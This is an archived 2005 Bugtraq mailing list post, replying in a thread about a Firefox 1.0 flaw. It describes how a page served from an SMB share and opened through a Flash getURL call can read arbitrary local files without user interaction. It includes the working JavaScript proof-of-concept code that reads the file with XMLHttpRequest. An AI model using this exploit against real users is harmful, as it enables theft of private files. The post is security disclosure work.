Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Re: [Full-Disclosure] Fireflashing [Firefox 1.0]
From: Jelmer Kuperus <jkuperus () planet nl>
Date: Sat, 12 Feb 2005 15:25:30 +0100

I took a quick 5 minute look at this, and it looks like you can read arbitrary files with this without requiring any kind of user interaction.

Just create a file called whatever.html on a windows SMB share with this content

--snip--

<script language="javascript">
   var oXML=new XMLHttpRequest();
   oXML.open("GET","file:///C:/jelmer.txt",false);
   oXML.send(null);
   alert(oXML.responseText);
</script>

--snip--

Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html
(I just created an empty flash file with a single action that contained the following line of actionscript : getURL ("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )
and presto it will display the contents of c:\jelmer.txt


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]